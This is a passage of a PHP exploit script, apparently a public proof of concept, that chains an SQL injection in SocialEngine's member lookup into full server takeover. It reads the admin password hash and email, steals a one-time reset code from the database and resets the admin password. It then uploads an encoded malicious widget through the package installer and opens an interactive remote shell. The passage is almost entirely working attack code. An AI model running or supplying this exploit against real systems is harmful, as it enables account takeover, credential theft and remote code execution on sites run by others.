\n\n"); function mysql_hex($input) { for ($i = 0, $l = strlen($input); $i < $l; $i++) $encoded .= sprintf("%02X", ord($input[$i])); return "0x{$encoded}"; } function sql_injection($query) { global $ch, $columns, $url; $nulls = substr(str_repeat("null,", $columns - 1), 0, -1); $sqli = "\") AND 0 UNION SELECT ({$query}),{$nulls} #"; curl_setopt($ch, CURLOPT_URL, "{$url}activity/index/get-memberall"); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["text" => $sqli])); $json_res = json_decode(curl_exec($ch)); if ($json_res == null or !count($json_res) or !isset($json_res[0]->id)) die("[-] SQL injection failed!\n"); return $json_res[0]->id; } $url = $argv[1]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$url}activity/index/get-memberall"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); //curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080"); print "[+] Looking for correct number of columns for the SQLi\n"; $columns = false; for ($i = 50; $i <= 100; $i++) { print "\r[+] Trying with number: {$i}"; $nulls = substr(str_repeat("null,", $i), 0, -1); $sqli = "\") AND 0 UNION SELECT {$nulls}#"; curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["text" => $sqli])); $json_res = json_decode(curl_exec($ch)); if ($json_res != null and count($json_res) > 0) { $columns = $i; break; } } if (!$columns) die("\n[-] Attack failed, number of columns not found!\n");; print "\n[*] Number of columns for the SQLi: {$columns}\n"; print "[+] Fetching admin password hash\n"; $admin_pwd = sql_injection("SELECT password FROM engine4_users WHERE user_id = 1"); print "[*] Admin password hash: {$admin_pwd}\n"; print "[+] Fetching admin email address\n"; $admin_email = sql_injection("SELECT email FROM engine4_users WHERE user_id = 1"); print "[*] Admin email address: {$admin_email}\n"; print "[+] Sending OTP to this email address\n"; curl_setopt($ch, CURLOPT_URL, "{$url}core/otp/sendotp?email=".urlencode($admin_email)."&type=forgot"); curl_setopt($ch, CURLOPT_POST, false); if (!preg_match("/code sent successfully/i", curl_exec($ch))) die("[-] OTP not sent!\n"); print "[+] Fetching OTP\n"; $otp = sql_injection("SELECT code FROM engine4_user_codes WHERE email = ".mysql_hex($admin_email)); print "[*] OTP: {$otp}\n"; print "[+] Validating OTP\n"; unlink("./cookies.txt"); curl_setopt($ch, CURLOPT_URL, "{$url}core/otp/validateotp?email=".urlencode($admin_email)."&code={$otp}&type=forgot"); curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt"); curl_setopt($ch, CURLOPT_POST, false); if (!preg_match("/code you entered is valid/i", curl_exec($ch))) die("[-] OTP validation failed!\n"); print "[+] Retrieving password reset URL\n"; curl_setopt($ch, CURLOPT_URL, "{$url}user/auth/forgot"); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["email" => $admin_email])); if (!preg_match("/user\/auth\/reset\/code\/[^']+/", curl_exec($ch), $m)) die("[-] Password reset URL not found!\n"); print "[+] Resetting password through the following URL: {$url}{$m[0]}\n"; curl_setopt($ch, CURLOPT_URL, "{$url}{$m[0]}"); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["password" => "H4ck3d???", "passconf" => "H4ck3d???"])); if (!preg_match("/password has been reset/i", curl_exec($ch))) die("[-] Password reset failed!\n"); print "[+] Performing login as admin user\n"; curl_setopt($ch, CURLOPT_URL, "{$url}login"); curl_setopt($ch, CURLOPT_POST, false); $res = curl_exec($ch); if (preg_match('/"captcha\[id\]" value="([^"]+)/i', $res, $m)) { print "[+] CAPTCHA required! Downloading it\n"; if (!preg_match('/src="\/(public\/[^"]+)/i', $res, $img)) die("[-] CAPTCHA URL not found!\n"); file_put_contents("CAPTCHA.png", file_get_contents($url.$img[1])); print "[+] Open CAPTCHA.png and insert the text: "; $input = trim(fgets(STDIN)); } curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["email" => $admin_email, "password" => "H4ck3d???", "captcha[id]" => $m[1], "captcha[input]" => $input])); if (!preg_match('/"status":true/i', curl_exec($ch))) die("[-] Login failed!\n"); print "[+] Changing admin password once again\n"; curl_setopt($ch, CURLOPT_URL, "{$url}members/settings/password"); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["oldPassword" => "H4ck3d???", "password" => "H4ck3d???!", "passwordConfirm" => "H4ck3d???!"])); if (!preg_match('/"status":true/i', curl_exec($ch))) die("[-] Password change failed!\n"); print "[+] Performing login into Packages Manager\n"; curl_setopt($ch, CURLOPT_URL, "{$url}install/login"); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["email" => $admin_email, "password" => "H4ck3d???!"])); if (strlen(curl_exec($ch)) > 0) die("[-] Login failed!\n"); print "[+] Uploading RCE widget\n"; file_put_contents("p.tar", gzdecode(base64_decode("H4sIAAAAAAAAA+1XUW/bNhD2c34FIQxwgiUxJdOSkm3tQxFgDxswZMH20AYBRZ9trbIkkJIzr8h/34mkZGmwkxZJW3Tg92CZH4/kHXXkfeJlmaWCV2mRT+7T+RIqNZECJmuepwtQ1Xm5KkfPBEWEjOknZf7wSalPo3Dkz/yQhgFlU+QDik0yos9d+GNQq4pLQkb39/dnc17xQ3ZP9X+j+PE1vmAioaplTriUfEuOjwgZl1y850sYk59eEWzverCv2pamY2wyZnxq+JyvLY8Z1JIbkAqTy/DReXxO256SVytD8/1J2BpWaZXZia/fXLXsHJSQaVl1k7cdvK5WhfwPJxo71YYzDIgQqo3THHMhy+wYQnzN1uVS8jl0bGAihIUEterYqWXXxaY1PWkdTSWIqpApPLH+49ugp9M/+1/Anu0/tPn7dvTAfo7RH1gWcmu4P41b2HXyA3n96mtnr8NzcSDnJkKpl7j6NfT9H+r7349mtP80CAN7//sRmwUjvP1nSBH6Iqs/gfb+h2X692N2T/V/ozD3P2x4dpxwBSG7m4Mo5nD83d3vV9d/XF2/Hf98c/Pb3Zvx7Yk+8kdf22OHl4St8+d/qSL/XGvoI07pofMfTFELWv3nMxbh+UcByNz5/xL4gDXea/SEd0k8UwC8pu57jZpoOCwGhrBaouG0kjCshE1q6bzOMs01wq4x69WWd21xeTfpJpRQFipFYbTtD1bv634TJbd246aGUxIw8iu+rIAGIQmml8y/9Kfk+yaHzIxa1jTWKGoM0xM1DW/NVvU6GSwCG8iKEmSfNDJSIfVW6y/Pw8et7lpDxZH/YPhPcXGfkwfcPODXHs+sb9Y7bIkVz5fwS7G045B9MDEZGbyLyUredkGrddumFbm7ZqNud9sgcGSC98dwK0vI55ALVLt9vsJvyd263RQY2zpVauBU16kqWQv8MIHdXh9Oqdakl86t8N56rUr/yNTUpv3V230m3SKD2fofy90E5g2mzbtb8EzBgF+kOgdwiSHf7EezE17zwTycSqX/NENmERvSK+43A0IWJUkgBIU49ONpHECwSBgwJhLsieIL8GcQL6jXDX44fTwqKwE/e0B0bzxJEi8uwiRmPKTiIqHCD1kYxUkkQhBTP8ZY2TRiQS8e++/2qG09HD04ufI4+vrfagFlD8QZHoczfdU/Ux18Uv2PkPejAM1d/f8CcPXf1X9X/1393xOVq/8ODg4ODg4ODg4ODg4ODv8T/Avviy8jACgAAA=="))); curl_setopt($ch, CURLOPT_URL, "{$url}install/manage/upload"); curl_setopt($ch, CURLOPT_POSTFIELDS, ["Filedata" => new CURLFile("p.tar"), "format" => "json"]); if (!preg_match('/"status":1/i', curl_exec($ch))) die("[-] Upload failed!\n"); print "[+] Installing RCE widget\n"; curl_setopt($ch, CURLOPT_URL, "{$url}install/manage/extract?package=p.tar&format=json"); curl_setopt($ch, CURLOPT_POST, false); if (!preg_match('/"status":1/i', curl_exec($ch))) die("[-] Extract failed!\n"); curl_setopt($ch, CURLOPT_URL, "{$url}install/manage/prepare"); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["packages[]" => "widget-rce-7.8.0"])); if (!preg_match('/continue/i', curl_exec($ch))) die("[-] Prepare failed!\n"); curl_setopt($ch, CURLOPT_URL, "{$url}install/manage/prepare?skip=0"); curl_setopt($ch, CURLOPT_POST, false); if (strlen(curl_exec($ch)) > 0) die("[-] Prepare failed!\n"); curl_setopt($ch, CURLOPT_URL, "{$url}install/manage/vfs"); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["config[path]" => 1, "config[search]" => 1, "adapter" => "system", "step" => "adapter", "previousAdapter" => "system", "execute" => 1])); if (strlen(curl_exec($ch)) > 0) die("[-] VFS request failed!\n"); curl_setopt($ch, CURLOPT_URL, "{$url}install/manage/perms"); curl_setopt($ch, CURLOPT_POST, false); if (!preg_match('/continue with the installation/i', curl_exec($ch))) die("[-] Perms request failed!\n"); curl_setopt($ch, CURLOPT_URL, "{$url}install/manage/place"); if (!preg_match('/continue with the installation/i', curl_exec($ch))) die("[-] Place request failed!\n"); curl_setopt($ch, CURLOPT_URL, "{$url}install/manage/query"); if (!preg_match('/can now finalize the installation/i', curl_exec($ch))) die("[-] Query request failed!\n"); curl_setopt($ch, CURLOPT_URL, "{$url}install/manage/complete"); if (!preg_match('/installation has been completed successfully/i', curl_exec($ch))) die("[-] Complete request failed!\n"); print "[+] Restoring original admin password\n"; $phpcode = 'define("_ENGINE", 1); $settings = include "../../settings/database.php"; $params = $settings["params"]; $link = mysqli_connect($params["host"], $params["username"], $params["password"], $params["dbname"]); if (mysqli_query($link, "UPDATE engine4_users SET password = '.mysql_hex($admin_pwd).' WHERE user_id = 1")) print "DONE"; mysqli_close($link);'; curl_setopt($ch, CURLOPT_URL, "{$url}application/widgets/rce/css.php"); curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode($phpcode)]); if (!preg_match('/DONE/', curl_exec($ch))) die("[-] Exploit failed!\n"); print "[+] Launching shell\n"; $phpcode = "chdir('../../..'); print '____'; passthru(base64_decode('%s')); print '____';"; while(1) { print "\nsocialengine-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode(sprintf($phpcode, base64_encode($cmd)))]); preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n"); } // cleanup unlink("./CAPTCHA.png"); unlink("./cookies.txt"); unlink("./p.tar");